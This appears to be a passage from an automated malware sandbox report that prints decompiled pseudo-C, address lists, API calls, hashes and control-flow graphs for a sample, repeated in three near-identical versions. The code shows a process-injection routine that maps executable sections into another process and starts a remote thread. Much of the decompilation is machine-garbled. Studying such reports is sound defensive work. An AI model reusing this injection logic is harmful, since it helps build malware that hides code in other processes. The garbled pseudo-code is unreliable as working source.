                                                				_t128 =  *((intOrPtr*)(_t202 + 8));
                                                				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
                                                				_t188 = _t202 - 0x60;
                                                				 *_t188 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
                                                				_t91 =  *_t188;
                                                				if(_t91 != 0) {
                                                					_t132 = _t202 - 0x30;
                                                					 *_t132 = _t91;
                                                					_t132[1] = 0;
                                                					_t188 = _t202 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
                                                					 *_t188 = 0x18;
                                                					_push(_t202 - 0x30);
                                                					_push(_t188);
                                                					_push(0x40);
                                                					_push(_t202 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t202 - 8)) = 0;
                                                						_t99 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t190 = _t202 - 0x54;
                                                						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t202 - 0x50);
                                                							_t122 = _t202 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t202 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                									_t201 =  *(_t202 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
                                                									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                						_t188 = _t202 - 0x58;
                                                						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                                                							 *_t46 =  *(_t202 - 0x50);
                                                							_t103 = _t202 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t202 - 0x40;
                                                								 *_t105 = 0;
                                                								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                                                								if(_t224 == 0) {
                                                									L24();
                                                									if(_t224 == 0 && _t224 != 0) {
                                                										asm("hlt");
                                                										_push(_t205);
                                                									}
                                                									_push(0x2ea6);
                                                									_t209 = _t205 + 4;
                                                									_t161 = 0x2260;
                                                									_t162 = _t161 << 5;
                                                									_t163 = _t162 + 0x2260;
                                                									asm("lodsb");
                                                									_t164 = _t163;
                                                									asm("loop 0xffffffc4");
                                                									_t165 = _t164 ^ 0xad610a21;
                                                									_t205 = _t209 - _t165;
                                                									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                                                									_t139 =  *(_t195 + 6) & 0x0000ffff;
                                                									_push(_t195);
                                                									_t166 = _t195;
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_t167 = _t166 + 0xf8;
                                                										__eflags = _t167;
                                                									} else {
                                                										_t167 = _t166 + 0x108;
                                                									}
                                                									_push(_t139);
                                                									_t140 =  *(_t167 + 0x10);
                                                									if(_t140 != 0) {
                                                										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                                                										_t205 = _t205 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t188);
                                                									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_push(_t188);
                                                										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                                                										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                                                										__eflags = _t198;
                                                										while(1) {
                                                											__eflags =  *_t198;
                                                											if( *_t198 == 0) {
                                                												break;
                                                											}
                                                											_t180 =  *_t198;
                                                											_t198 = _t198 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t170;
                                                												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t188);
                                                										__eflags = 0;
                                                										_t109 = _t202 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
                                                									} else {
                                                										L57();
                                                										_pop(_t181);
                                                										_t182 = _t181 - 0x1892;
                                                										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                                                										L004012E3(_t128, _t228);
                                                										0x33(_t182 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t205;
                                                				_push(0x392);
                                                				_t157 = 0xf1;
                                                				return L00401274(_t92, _t157, _t188, _t228);
                                                			}







































                                                0x004015ea
                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: dd4e0de63926995d70c8012033ee98f8c579de9534f11a3daa29428e27a07aaf
                                                • Instruction ID: 897f24c5fa4790511d5421a469eabb5bc73caab52430bd7d1b353843a9d98d60
                                                • Opcode Fuzzy Hash: dd4e0de63926995d70c8012033ee98f8c579de9534f11a3daa29428e27a07aaf
                                                • Instruction Fuzzy Hash: CB510BB4900245BBEF209F91CC48FEB7BB8FF85700F14016AF912BA2E5D6759945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 141 4015e0-4015ef 143 401603 141->143 144 4015f4-40162b call 401274 141->144 143->144 151 401630-401635 144->151 152 40162d 144->152 154 401956-40195e 151->154 155 40163b-40164c 151->155 152->151 154->151 160 401963-4019b3 call 401274 154->160 158 401652-40167b 155->158 159 401954 155->159 158->159 168 401681-401698 NtDuplicateObject 158->168 159->160 168->159 170 40169e-4016c2 NtCreateSection 168->170 171 4016c4-4016e5 NtMapViewOfSection 170->171 172 40171e-401744 NtCreateSection 170->172 171->172 174 4016e7-401703 NtMapViewOfSection 171->174 172->159 175 40174a-40174e 172->175 174->172 177 401705-40171b 174->177 175->159 178 401754-401775 NtMapViewOfSection 175->178 177->172 178->159 180 40177b-401797 NtMapViewOfSection 178->180 180->159 183 40179d call 4017a2 180->183
                                                C-Code - Quality: 58%
                                                			E004015E0(void* __esi, void* __eflags) {
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t133;
                                                				signed int _t140;
                                                				int _t141;
                                                				void* _t158;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				signed int _t166;
                                                				void* _t167;
                                                				intOrPtr* _t168;
                                                				void* _t171;
                                                				intOrPtr _t181;
                                                				void* _t182;
                                                				void* _t183;
                                                				HANDLE* _t189;
                                                				HANDLE* _t191;
                                                				void* _t196;
                                                				intOrPtr* _t199;
                                                				void* _t202;
                                                				void* _t203;
                                                				void* _t205;
                                                				intOrPtr* _t206;
                                                				void* _t210;
                                                				long _t225;
                                                
                                                				asm("bound edi, [eax+0x161d]");
                                                				_push(0x392);
                                                				_t206 = _t205 + 4;
                                                				L00401274(0x161d, 0xf1, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t203 + 8));
                                                				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t203 - 0x5c)) = _t88;
                                                				_t189 = _t203 - 0x60;
                                                				 *_t189 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t189);
                                                				_t91 =  *_t189;
                                                				if(_t91 != 0) {
                                                					_t133 = _t203 - 0x30;
                                                					 *_t133 = _t91;
                                                					_t133[1] = 0;
                                                					_t189 = _t203 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t189, 0x18);
                                                					 *_t189 = 0x18;
                                                					_push(_t203 - 0x30);
                                                					_push(_t189);
                                                					_push(0x40);
                                                					_push(_t203 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t203 - 8)) = 0;
                                                						_t99 = _t203 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t191 = _t203 - 0x54;
                                                						if(NtCreateSection(_t191, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t203 - 0x50);
                                                							_t122 = _t203 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t191, 0xffffffff, _t122, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t203 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t191,  *(_t203 - 0xc), _t124, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                									_t202 =  *(_t203 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t202, 0x104);
                                                									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                                                									 *((intOrPtr*)(_t203 - 8)) =  *((intOrPtr*)(_t203 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t203 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                                                						_t189 = _t203 - 0x58;
                                                						if(NtCreateSection(_t189, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t203 - 8)) != 0) {
                                                							 *_t46 =  *(_t203 - 0x50);
                                                							_t103 = _t203 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t189, 0xffffffff, _t103, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t203 - 0x40;
                                                								 *_t105 = 0;
                                                								_t225 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t105, 0, 0, 0, _t203 - 0x38, 1, 0, 0x20);
                                                								if(_t225 == 0) {
                                                									L23();
                                                									if(_t225 == 0 && _t225 != 0) {
                                                										asm("hlt");
                                                										_push(_t206);
                                                									}
                                                									_push(0x2ea6);
                                                									_t210 = _t206 + 4;
                                                									_t162 = 0x2260;
                                                									_t163 = _t162 << 5;
                                                									_t164 = _t163 + 0x2260;
                                                									asm("lodsb");
                                                									_t165 = _t164;
                                                									asm("loop 0xffffffc4");
                                                									_t166 = _t165 ^ 0xad610a21;
                                                									_t206 = _t210 - _t166;
                                                									_t196 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
                                                									_t140 =  *(_t196 + 6) & 0x0000ffff;
                                                									_push(_t196);
                                                									_t167 = _t196;
                                                									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                										_t168 = _t167 + 0xf8;
                                                										__eflags = _t168;
                                                									} else {
                                                										_t168 = _t167 + 0x108;
                                                									}
                                                									_push(_t140);
                                                									_t141 =  *(_t168 + 0x10);
                                                									if(_t141 != 0) {
                                                										memcpy( *((intOrPtr*)(_t168 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t168 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t141);
                                                										_t206 = _t206 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t189);
                                                									_t229 =  *((intOrPtr*)(_t203 - 0x34));
                                                									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                                                										_push(_t189);
                                                										_t171 = _t189[0xd] -  *(_t203 - 0x40);
                                                										_t199 = _t189[0x28] +  *(_t203 - 0x48);
                                                										__eflags = _t199;
                                                										while(1) {
                                                											__eflags =  *_t199;
                                                											if( *_t199 == 0) {
                                                												break;
                                                											}
                                                											_t181 =  *_t199;
                                                											_t199 = _t199 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t171;
                                                												__eflags =  *((intOrPtr*)( *(_t203 - 0x48) + 0 + _t181));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t189);
                                                										__eflags = 0;
                                                										_t109 = _t203 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t109, 0);
                                                									} else {
                                                										L56();
                                                										_pop(_t182);
                                                										_t183 = _t182 - 0x1892;
                                                										 *((intOrPtr*)(_t183 + 0x18c6)) = _t183 + 0x304c;
                                                										L004012E3(_t128, _t229);
                                                										0x33(_t183 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t183 + 0x18eb)) = _t183 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t206;
                                                				_push(0x392);
                                                				_t158 = 0xf1;
                                                				return L00401274(_t92, _t158, _t189, _t229);
                                                			}







































                                                0x004015e2
                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 59eebf06962e76d0b9a77aedd2cacf8695bc8255fa518079300205c73098de0f
                                                • Instruction ID: 8306347d173e952d8899d3997cb349dcf7f01c905c4505a4b1f9f6e7b55dad69
                                                • Opcode Fuzzy Hash: 59eebf06962e76d0b9a77aedd2cacf8695bc8255fa518079300205c73098de0f
                                                • Instruction Fuzzy Hash: 7E5119B0900245BFEB209F91CC48FEBBBB8EF85700F14416AF911BB2A5D6759945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 186 4015ee-4015ef 188 401603 186->188 189 4015f4-40162b call 401274 186->189 188->189 196 401630-401635 189->196 197 40162d 189->197 199 401956-40195e 196->199 200 40163b-40164c 196->200 197->196 199->196 205 401963-4019b3 call 401274 199->205 203 401652-40167b 200->203 204 401954 200->204 203->204 213 401681-401698 NtDuplicateObject 203->213 204->205 213->204 215 40169e-4016c2 NtCreateSection 213->215 216 4016c4-4016e5 NtMapViewOfSection 215->216 217 40171e-401744 NtCreateSection 215->217 216->217 219 4016e7-401703 NtMapViewOfSection 216->219 217->204 220 40174a-40174e 217->220 219->217 222 401705-40171b 219->222 220->204 223 401754-401775 NtMapViewOfSection 220->223 222->217 223->204 225 40177b-401797 NtMapViewOfSection 223->225 225->204 228 40179d call 4017a2 225->228
                                                C-Code - Quality: 58%
                                                			E004015EE(void* __esi, void* __eflags) {
                                                				void* _t85;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t132;
                                                				signed int _t139;
                                                				int _t140;
                                                				void* _t157;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				void* _t166;
                                                				intOrPtr* _t167;
                                                				void* _t170;
                                                				intOrPtr _t180;
                                                				void* _t181;
                                                				void* _t182;
                                                				HANDLE* _t188;
                                                				HANDLE* _t190;
                                                				void* _t195;
                                                				intOrPtr* _t198;
                                                				void* _t201;
                                                				void* _t202;
                                                				void* _t204;
                                                				intOrPtr* _t205;
                                                				void* _t209;
                                                				long _t224;
                                                
                                                				asm("lodsd");
                                                				_push(0x392);
                                                				_t205 = _t204 + 4;
                                                				L00401274(_t85, 0xf1, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t202 + 8));
                                                				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
                                                				_t188 = _t202 - 0x60;
                                                				 *_t188 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
                                                				_t91 =  *_t188;
                                                				if(_t91 != 0) {
                                                					_t132 = _t202 - 0x30;
                                                					 *_t132 = _t91;
                                                					_t132[1] = 0;
                                                					_t188 = _t202 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
                                                					 *_t188 = 0x18;
                                                					_push(_t202 - 0x30);
                                                					_push(_t188);
                                                					_push(0x40);
                                                					_push(_t202 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t202 - 8)) = 0;
                                                						_t99 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t190 = _t202 - 0x54;
                                                						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t202 - 0x50);
                                                							_t122 = _t202 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t202 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                									_t201 =  *(_t202 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
                                                									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                						_t188 = _t202 - 0x58;
                                                						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                                                							 *_t46 =  *(_t202 - 0x50);
                                                							_t103 = _t202 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t202 - 0x40;
                                                								 *_t105 = 0;
                                                								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                                                								if(_t224 == 0) {
                                                									L22();
                                                									if(_t224 == 0 && _t224 != 0) {
                                                										asm("hlt");
                                                										_push(_t205);
                                                									}
                                                									_push(0x2ea6);
                                                									_t209 = _t205 + 4;
                                                									_t161 = 0x2260;
                                                									_t162 = _t161 << 5;
                                                									_t163 = _t162 + 0x2260;
                                                									asm("lodsb");
                                                									_t164 = _t163;
                                                									asm("loop 0xffffffc4");
                                                									_t165 = _t164 ^ 0xad610a21;
                                                									_t205 = _t209 - _t165;
